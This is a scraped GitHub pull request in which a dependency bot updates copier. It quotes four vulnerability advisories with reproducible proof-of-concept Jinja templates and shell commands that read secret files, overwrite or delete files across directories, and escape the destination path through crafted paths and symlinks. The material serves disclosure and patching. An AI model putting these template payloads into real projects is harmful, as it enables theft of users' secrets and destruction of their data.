Update dependency copier to v9.11.2 [SECURITY] by renovate[bot] · Pull Request #17 · softboiler/captivate

renovate · 2025-08-18T22:51:11Z

This PR contains the following updates:

Package	Change	Age	Confidence
copier	`==9.2.0` → `==9.11.2`

GitHub Vulnerability Alerts

CVE-2025-55201

Impact

Copier's current security model shall restrict filesystem access through Jinja:

Files can only be read using {% include ... %}, which is limited by Jinja to reading files from the subtree of the local template clone in our case.
Files are written in the destination directory according to their counterparts in the template.

Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions which would require passing the --UNSAFE,--trust flag. As it turns out, a safe template can currently read and write arbitrary files because we expose a few pathlib.Path objects in the Jinja context which have unconstrained I/O methods. This effectively renders our security model w.r.t. filesystem access useless.

Arbitrary read access

Imagine, e.g., a malicious template author who creates a template that reads SSH keys or other secrets from well-known locations, perhaps "masks" them with Base64 encoding to reduce detection risk, and hopes for a user to push the generated project to a public location like github.com where the template author can extract the secrets.

Reproducible example:

Read known file:

echo "s3cr3t" > secret.txt
mkdir src/
echo "stolen secret: {{ (_copier_conf.dst_path / '..' / 'secret.txt').resolve().read_text('utf-8') }}" > src/stolen-secret.txt.jinja
uvx copier copy src/ dst/
cat dst/stolen-secret.txt

Read unknown file(s) via globbing:

mkdir secrets/
echo "s3cr3t #&#8203;1" > secrets/secret1.txt
echo "s3cr3t #&#8203;2" > secrets/secret2.txt
mkdir src/
cat <<'EOF' > src/stolen-secrets.txt.jinja
stolen secrets:
{% set parent = (_copier_conf.dst_path / '..' / 'secrets').resolve() %}
{% for f in parent.glob('*.txt') %}
{{ f }}: {{ f.read_text('utf-8') }}
{% endfor %}
EOF
uvx copier copy src/ dst/
cat dst/stolen-secrets.txt

Arbitrary write access

Imagine, e.g., a malicious template author who creates a template that overwrites or even deletes files to cause havoc.

Reproducible examples:

Overwrite known file:

echo "s3cr3t" > secret.txt
mkdir src/
echo "{{ (_copier_conf.dst_path / '..' / 'secret.txt').resolve().write_text('OVERWRITTEN', 'utf-8') }}" > src/malicious.txt.jinja
uvx copier copy src/ dst/
cat secret.txt

Overwrite unknown file(s) via globbing:

echo "s3cr3t" > secret.txt
mkdir src/
cat <<'EOF' > src/malicious.txt.jinja
{% set parent = (_copier_conf.dst_path / '..').resolve() %}
{% for f in (parent.glob('*.txt') | list) %}
{{ f.write_text('OVERWRITTEN', 'utf-8') }}
{% endfor %}
EOF
uvx copier copy src/ dst/
cat secret.txt

Delete unknown file(s) via globbing:

echo "s3cr3t" > secret.txt
mkdir src/
cat <<'EOF' > src/malicious.txt.jinja
{% set parent = (_copier_conf.dst_path / '..').resolve() %}
{% for f in (parent.glob('*.txt') | list) %}
{{ f.unlink() }}
{% endfor %}
EOF
uvx copier copy src/ dst/
cat secret.txt

Delete unknown files and directories via tree walking:

mkdir data
mkdir data/a
mkdir data/a/b
echo "foo" > data/foo.txt
echo "bar" > data/a/bar.txt
echo "baz" > data/a/b/baz.txt
tree data/
mkdir src/
cat <<'EOF' > src/malicious.txt.jinja
{% set parent = (_copier_conf.dst_path / '..' / 'data').resolve() %}
{% for root, dirs, files in parent.walk(top_down=False) %}
{% for name in files %}
{{ (root / name).unlink() }}
{% endfor %}
{% for name in dirs %}
{{ (root / name).rmdir() }}
{% endfor %}
{% endfor %}
EOF
uvx copier copy src/ dst/
tree data/

CVE-2025-55214

Impact

Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions which would require passing the --UNSAFE,--trust flag. As it turns out, a safe template can currently write files outside the destination path where a project shall be generated or updated. This is possible when rendering a generated directory structure whose rendered path is either a relative parent path or an absolute path. Constructing such paths is possible using Copier's builtin pathjoin Jinja filter and its builtin _copier_conf.sep variable, which is the platform-native path separator. This way, a malicious template author can create a template that overwrites arbitrary files (according to the user's write permissions), e.g., to cause havoc.

Write access via generated relative path

Reproducible example:

echo "foo" > forbidden.txt
mkdir src/
echo "bar" > "src/{{ pathjoin('..', 'forbidden.txt') }}"
uvx copier copy src/ dst/
cat forbidden.txt

Write access via generated absolute path

Reproducible example:

POSIX:

# Assumption: The current working directory is `/tmp/test-copier-vulnerability/`
echo "foo" > forbidden.txt
mkdir src/
echo "bar" > "src/{{ pathjoin(_copier_conf.sep, 'tmp', 'test-copier-vulnerability', 'forbidden.txt') }}"
uvx --from copier python -O -m copier copy --overwrite src/ dst/
cat forbidden.txt

Windows (PowerShell):

# Assumption: The current working directory is `C:\Users\<user>\Temp\test-copier-vulnerability`
echo "foo" > forbidden.txt
mkdir src
Set-Content -Path src\copier.yml @&#8203;'
drive:
  type: str
  default: "C:"
  when: false
'@&#8203;
echo "bar" > "src\{{ pathjoin(drive, 'Users', '<user>', 'Temp', 'test-copier-vulnerability', 'forbidden.txt') }}"
uvx --from copier python -O -m copier copy --overwrite src dst
cat forbidden.txt

This scenario is slightly less severe, as Copier has a few assertions of the destination path being relative which would typically be raised. But python -O (or PYTHONOPTIMIZE=x) removes asserts, so these guards may be ineffective. In addition, this scenario will prompt for overwrite confirmation or require the --overwrite flag for non-interactive mode; yet malicious file writes might go unnoticed.

CVE-2026-23968

Impact

Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions which would require passing the --UNSAFE,--trust flag. As it turns out, a safe template can currently include arbitrary files/directories outside the local template clone location by using symlinks along with _preserve_symlinks: false (which is Copier's default setting).

Imagine, e.g., a malicious template author who creates a template that reads SSH keys or other secrets from well-known locations and hopes for a user to push the generated project to a public location like github.com where the template author can extract the secrets.

Reproducible example:

Illegally include a file in the generated project via symlink resolution:

echo "s3cr3t" > secret.txt

mkdir src/
pushd src/
ln -s ../secret.txt stolen-secret.txt
popd

uvx copier copy src/ dst/

cat dst/stolen-secret.txt
#s3cr3t

Illegally include a directory in the generated project via symlink resolution:

mkdir secrets/
pushd secrets/
echo "s3cr3t" > secret.txt
popd

mkdir src/
pushd src/
ln -s ../secrets stolen-secrets
popd

uvx copier copy src/ dst/

tree dst/
# dst/
# └── stolen-secrets
#     └── secret.txt
#
# 1 directory, 1 file
cat dst/stolen-secrets/secret.txt
# s3cr3t

Patches

n/a

Workarounds

n/a

References

n/a

CVE-2026-23986

Impact

Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions which would require passing the --UNSAFE,--trust flag. As it turns out, a safe template can currently write to arbitrary directories outside the destination path by using directory a symlink along with _preserve_symlinks: true and a generated directory structure whose rendered path is inside the symlinked directory. This way, a malicious template author can create a template that overwrites arbitrary files (according to the user's write permissions), e.g., to cause havoc.

Note

At the time of writing, the exploit is non-deterministic, as Copier walks the template's file tree using os.scandir which yields directory entries in arbitrary order.

Reproducible example (may or may not work depending on directory entry yield order):

mkdir other/
pushd other/
echo "sensitive" > sensitive.txt
popd

mkdir src/
pushd src/
ln -s ../other other
echo "overwritten" > "{{ pathjoin('other', 'sensitive.txt') }}.jinja"
echo "_preserve_symlinks: true" > copier.yml
tree .

# .
# ├── copier.yml

# ├── other -> ../other
# └── {{ pathjoin('other', 'sensitive.txt') }}.jinja

#
# 1 directory, 2 files
popd

uvx copier copy --overwrite src/ dst/

cat other/sensitive.txt

# overwritten

Patches

n/a

Workarounds

n/a

References

n/a

Release Notes

copier-org/copier (copier)

Conversation

renovate bot commented Aug 18, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

GitHub Vulnerability Alerts

Impact

Arbitrary read access

Arbitrary write access

Impact

Write access via generated relative path

Write access via generated absolute path

Impact

Patches

Workarounds

References

Impact

Patches

Workarounds

References

Release Notes

Fix

Security

Fix

Feat

Fix

Refactor

Fix

Fix

Fix

Feat

Fix

Security

Feat

Fix

Feat

Fix

Refactor

Feat

Fix

Refactor

Feat

Fix

Refactor

Feat

Fix

Fix

Fix

Refactor

Perf

Fix

Feat

Fix

Configuration

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

renovate bot commented Aug 18, 2025 •

edited

Loading